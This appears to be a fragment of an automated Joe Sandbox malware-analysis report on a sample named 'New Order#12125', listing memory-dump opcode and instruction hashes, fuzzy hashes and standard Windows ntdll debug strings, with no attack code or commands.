                                                                        • Opcode Fuzzy Hash: 112f46e59a7665649f46ea30997378864f95fed2ae5f09b6f9a3bd72ce31da40
                                                                        • Instruction Fuzzy Hash: 34F0A931A26A928FE772D7BCE280B5E77E0BB50A20F0A05A4D4108FD12C330EC80C750
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                                                        • Instruction ID: 5ce1dfb9cb368c16d29eddfe25e969e0b0169d1732906491026ab71fd4ae9c05
                                                                        • Opcode Fuzzy Hash: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                                                        • Instruction Fuzzy Hash: 01E0DF72A40120BBEB22A7998D05F9EBEACEBD0EA0F090054B600EB0E0E530DE00C6D0
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: c6a5ad91a7d0f1a4d9806dabaf8f22ecb250b1deeb68cfbfcde1a852261f70b4
                                                                        • Instruction ID: 24ec77fb28a4277a6f311d75e137f4cf1c66b67de339270e96584310559d4652
                                                                        • Opcode Fuzzy Hash: c6a5ad91a7d0f1a4d9806dabaf8f22ecb250b1deeb68cfbfcde1a852261f70b4
                                                                        • Instruction Fuzzy Hash: 49E09B316407508BCB359A1DC141A57BFE8FFD5660F15806DE9054B653C231F842C7D0
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: e283f87162f6299c2fafbd74fa34d62baffe4a0371ae0674834acd6e55ec6592
                                                                        • Instruction ID: d227a4101d734cee793ed6823d81273b232a84c6c42746944e83b18815c359be
                                                                        • Opcode Fuzzy Hash: e283f87162f6299c2fafbd74fa34d62baffe4a0371ae0674834acd6e55ec6592
                                                                        • Instruction Fuzzy Hash: D7E08C321004516BC212FA9DDD11E4A739AFFE4260F010125B1518B2D4CA20AC00C794
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
                                                                        • Instruction ID: 5b76b95668db4e5209a494717d3f9771c412364b93628cf3f688421852be48f2
                                                                        • Opcode Fuzzy Hash: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
                                                                        • Instruction Fuzzy Hash: F1E08633111A1487C729DE18D511B7677E4FF85730F09473EA6138B780C574E544C794
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                                        • Instruction ID: fdc6c5168658ae78a24ec798ea8c8354a35ca25e319609f08aee202c0f0880e1
                                                                        • Opcode Fuzzy Hash: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                                        • Instruction Fuzzy Hash: BFD0A932214620ABE772AA1CFC00FC333E8BB88734F060459B008CB060C360AC81CA84
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                                                        • Instruction ID: c2f70c7af9c086d308a2dd130b472b2ad421263f3537a7ddf7dd01ab4087ede8
                                                                        • Opcode Fuzzy Hash: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                                                        • Instruction Fuzzy Hash: 55E0EC369507859BDF53DF99D641F5EBBB9FF94B40F150458A1085F660C724AD00CB40
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                                        • Instruction ID: e4cf40c1675dcc46ab3276b7e4d1d14419492cfddba3404cbbbe6c79fa61af2d
                                                                        • Opcode Fuzzy Hash: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                                        • Instruction Fuzzy Hash: EAD0223222203197EB295A55A910F637905EFC0AA4F2A002E360E93A10C0248C43C2E0
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                                                        • Instruction ID: 39d9677fa07caf9976872f2501a548045004a4de0db184b6f3a45d0984885ecb
                                                                        • Opcode Fuzzy Hash: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                                                        • Instruction Fuzzy Hash: CDD012371E054DBBDB129F66DC01F957BA9FBA4BA0F444020B5048B5A0D63AE950D584
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 284261957f1f85fda1072669877ff66ee0ccd73ad40cac0ed56651fe9040a1fe
                                                                        • Instruction ID: 9d0c7c412d7e19e6337f9bbbdede60746cd178c271b60b2abef6165b593693be
                                                                        • Opcode Fuzzy Hash: 284261957f1f85fda1072669877ff66ee0ccd73ad40cac0ed56651fe9040a1fe
                                                                        • Instruction Fuzzy Hash: E0D0A730921002CBDF17DF48C515D2E37F1FF50644B40006CE701AE420E364EC02C710
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                                        • Instruction ID: 67fda6a2950abfacc4a63a63c04d565fc5132d38f88c4cca0721d149f1f07922
                                                                        • Opcode Fuzzy Hash: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                                        • Instruction Fuzzy Hash: FFD0C935212E80CFE71BDB0CC5A4B5933E8BB44B44F814890F401CFB66D62CD980CA40
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                        • Instruction ID: 71e1e3fa1bb945f03bd345fdcfc4e1263768369286aaf0b82851d55d7fa269d6
                                                                        • Opcode Fuzzy Hash: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                        • Instruction Fuzzy Hash: 68C012322A0648AFD712AA99CD01F027BA9FBA8B50F000021F2048B670D631E820EA84
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                        • Instruction ID: 0d8b178a3c63bce289dcf6604683ea3234637f686c4fa940e751b43eb3d81bfb
                                                                        • Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                        • Instruction Fuzzy Hash: 6ED01237100249EFCB05DF45C890D9A772AFBD8710F108019FD190B6508A31ED62DA90
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                        • Instruction ID: 60bec5e2460bf5cc3813db8ad4ecde4f89bf0c4b987a4ef364b03e229f54d5dd
                                                                        • Opcode Fuzzy Hash: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                        • Instruction Fuzzy Hash: 00C04879B01A428FDF56DB6AD2A4F49B7E4FB84790F150890E845CFB22E624E901CA10
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: b437deeb90b7eff2a49a9d95750fc022bda96382db6c971eb82c613f6eb5355f
                                                                        • Instruction ID: cd2810c3ae8062881371a5182ae5672492cf55826e4ceddf3bf37c694559583a
                                                                        • Opcode Fuzzy Hash: b437deeb90b7eff2a49a9d95750fc022bda96382db6c971eb82c613f6eb5355f
                                                                        • Instruction Fuzzy Hash: 6A900231605800129280715988945464045B7E0311B59C412F4424954CCA548A565761
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: fa9699895cae5e3ebbdaa42c8a7923ee052af60a080fb5bb4469d72c1555b7f4
                                                                        • Instruction ID: f37de82b517438baf1f5cd146ca2cd8cb2a901f990cb3ba6fcccdafd2cd628c8
                                                                        • Opcode Fuzzy Hash: fa9699895cae5e3ebbdaa42c8a7923ee052af60a080fb5bb4469d72c1555b7f4
                                                                        • Instruction Fuzzy Hash: D1900261601500424280715988144066045B7E1311399C516B4554960CC65889559769
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d743f08009619bd19744aed582edb2524dd008909b27d379643e40ed638045f7
                                                                        • Instruction ID: 0938a968eefb6af81e0f002140e769cb0279ea4644d7775395fd66992ddced36
                                                                        • Opcode Fuzzy Hash: d743f08009619bd19744aed582edb2524dd008909b27d379643e40ed638045f7
                                                                        • Instruction Fuzzy Hash: 7A90023120140802D2C07159841464A0045A7D1311F99C416B4025A54DCA558B597BA1
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 4b8f850e3897b600856afdcaa7c3ba4a8f0260f5af12edffd6cb7372bbc90c76
                                                                        • Instruction ID: c73e9a5d87c6d9f3860d6dc39b3515a4d1af4758600431f1203fb82266d3829c
                                                                        • Opcode Fuzzy Hash: 4b8f850e3897b600856afdcaa7c3ba4a8f0260f5af12edffd6cb7372bbc90c76
                                                                        • Instruction Fuzzy Hash: BA90023120544842D28071598414A460055A7D0315F59C412B4064A94DD6658E55BB61
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: fef496b53598d154f32b6125d155c89dcbf3774c45bca005894a7919d6f79ddf
                                                                        • Instruction ID: 298b3e5df36c5517d2ef66907452ecb71eeeec3cb27b360a7e35995b3f54f77b
                                                                        • Opcode Fuzzy Hash: fef496b53598d154f32b6125d155c89dcbf3774c45bca005894a7919d6f79ddf
                                                                        • Instruction Fuzzy Hash: E390023120140802D244715988146860045A7D0311F59C412BA024A55ED6A589917631
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 882ed77e62cff1bb06fb5d72e192722447f6db873fcb81011371fb690e91d1b9
                                                                        • Instruction ID: 8b6b4252511524c0c996783177199e401334055d7c86dbc0c17649f43074399f
                                                                        • Opcode Fuzzy Hash: 882ed77e62cff1bb06fb5d72e192722447f6db873fcb81011371fb690e91d1b9
                                                                        • Instruction Fuzzy Hash: 8E90023160540802D290715984247460045A7D0311F59C412B4024A54DC7958B557BA1
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 46da559da64f04210ff63fb1b65be8f089c44f9b10ede0a086952cd92f4abc5d
                                                                        • Instruction ID: 214febbc71f1f339fbcb0d4245c7f172611659158d17247f191078edcd20053f
                                                                        • Opcode Fuzzy Hash: 46da559da64f04210ff63fb1b65be8f089c44f9b10ede0a086952cd92f4abc5d
                                                                        • Instruction Fuzzy Hash: BF900225211400030245B55947145070086A7D5361359C422F5015950CD66189615621
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 999838836efa49ac1d32ac72ea6624b87642d745dde03eb3f153beedd90c581c
                                                                        • Instruction ID: f77e9253932dc39f8c83ad507a0500bf4286f8a34b87f5b02a86a953f58574f1
                                                                        • Opcode Fuzzy Hash: 999838836efa49ac1d32ac72ea6624b87642d745dde03eb3f153beedd90c581c
                                                                        • Instruction Fuzzy Hash: 62900225221400020285B559461450B0485B7D6361399C416F5416990CC66189655721
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 9adcecad03332ed1a7f1c74533c82f8a57d30e3df31675055fb078e4cf76339a
                                                                        • Instruction ID: 73886268a93384123654ba84723b62d6149f568040db39f719c2bd4c3399fc85
                                                                        • Opcode Fuzzy Hash: 9adcecad03332ed1a7f1c74533c82f8a57d30e3df31675055fb078e4cf76339a
                                                                        • Instruction Fuzzy Hash: A19002A1201540924640B259C414B0A4545A7E0211B59C417F5054960CC56589519635
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID: ___swprintf_l
                                                                        • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                        • API String ID: 48624451-2108815105
                                                                        APIs
                                                                        Strings
                                                                        Similarity
                                                                        • API ID: ___swprintf_l
                                                                        • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                        • API String ID: 48624451-2108815105
                                                                        Strings
                                                                        • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01574655
                                                                        • CLIENT(ntdll): Processing section info %ws..., xrefs: 01574787
                                                                        • Execute=1, xrefs: 01574713
                                                                        • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01574742
                                                                        • ExecuteOptions, xrefs: 015746A0
                                                                        • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01574725
                                                                        • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 015746FC
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                        • API String ID: 0-484625025
                                                                        APIs
                                                                        Strings
                                                                        Similarity
                                                                        • API ID: __aulldvrm
                                                                        • String ID: +$-$0$0
                                                                        • API String ID: 1302938615-699404926
                                                                        APIs
                                                                        Strings
                                                                        Similarity
                                                                        • API ID: ___swprintf_l
                                                                        • String ID: %%%u$[$]:%u
                                                                        • API String ID: 48624451-2819853543
                                                                        Strings
                                                                        • RTL: Re-Waiting, xrefs: 0157031E
                                                                        • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 015702E7
                                                                        • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 015702BD
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                        • API String ID: 0-2474120054
                                                                        APIs
                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0157728C
                                                                        Strings
                                                                        • RTL: Re-Waiting, xrefs: 015772C1
                                                                        • RTL: Resource at %p, xrefs: 015772A3
                                                                        • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01577294
                                                                        Similarity
                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                        • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                        • API String ID: 885266447-605551621
                                                                        APIs
                                                                        Strings
                                                                        Similarity
                                                                        • API ID: ___swprintf_l
                                                                        • String ID: %%%u$]:%u
                                                                        • API String ID: 48624451-3050659472
                                                                        Strings
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: $$@
                                                                        • API String ID: 0-1194432280
                                                                        APIs
                                                                        • @_EH4_CallFilterFunc@8.LIBCMT ref: 0158CFBD
                                                                        Strings
                                                                        Similarity
                                                                        • API ID: CallFilterFunc@8
                                                                        • String ID: @$@4Qw@4Qw
                                                                        • API String ID: 4062629308-2383119779